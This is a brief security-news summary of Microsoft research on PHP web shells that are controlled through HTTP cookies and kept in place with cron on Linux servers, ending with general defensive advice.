Microsoft’s latest security research has uncovered a concerning trend where threat actors are utilizing HTTP cookies to control PHP-based web shells on Linux servers, enabling them to execute remote code.
This tactic allows attackers to bypass traditional detection methods, instead relying on cookie values supplied by the threat actors to gate execution and maintain access to compromised systems.
The Microsoft Defender Security Research Team has delved into the specifics of this technique, which involves using Cron on Linux servers to persist the web shells, highlighting the evolving nature of web shell attacks and the need for robust security measures.
By leveraging cookies as a control channel, these web shells can remain hidden from conventional detection methods, making them particularly dangerous and underscoring the importance of monitoring HTTP traffic and cookie activity for signs of malicious behavior.
The findings emphasize the importance of implementing robust security controls, including regular system monitoring and the use of advanced threat detection tools, to prevent and detect such attacks.
As the threat landscape continues to evolve, it is crucial for organizations to stay informed about the latest tactics and techniques used by threat actors and to adapt their security strategies accordingly to protect against these emerging threats.
Source: Original Article
